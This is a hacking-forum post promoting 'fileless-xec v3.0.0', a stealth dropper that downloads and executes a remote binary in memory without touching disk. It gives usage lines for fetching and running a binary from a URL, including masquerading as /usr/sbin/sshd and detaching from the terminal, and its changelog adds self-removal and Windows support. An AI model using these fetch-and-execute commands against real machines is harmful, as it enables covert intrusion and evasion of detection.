• Earn real money by being active: Hello Guest, earn real money by simply being active on the forum — post quality content, get reactions, and help the community. Once you reach the minimum credit amount, you’ll be able to withdraw your balance directly. Learn how it works.

fileless-xec v3.0.0 - A stealth dropper

Status
Not open for further replies.

itsMe

*KillmeMories*
Staff member
Administrator
Super Moderator
Hacker
Specter
Crawler
Shadow
Joined
Jan 8, 2019
Messages
56,623
Solutions
2
Reputation
32
Reaction score
100,456
Points
2,313
Credits
32,750
‎6 Years of Service‎
 
76%
fileless-xec.gif


fileless-xec – A stealth dropper

Pentest use: fileless-xec is used on the target machine to execute a binary file on an attacker-controlled machine

Short story

fileless-xec enable us to execute a remote binary on a local machine in one step without dropping them on disk

    simple usage fileless-xec <binary_url>
    execute binary with specified program name: fileless-xec -n /usr/sbin/sshd <binary_raw_url>
    retrieve remote binary using http3 protocol and execute it: fileless-xec -http3 <binary_raw_url>
    detach program execution from tty: setsid fileless-xec […]

3.0.0 Latest

Changed

    Rebranding from curlNexecto fileless-xec

Added

    Self remove of fileless-xec dropper
    Server mode
    Windows support
    Exec without using memfd syscall


To see this hidden content, you must like this content.
 
Status
Not open for further replies.
Back
Top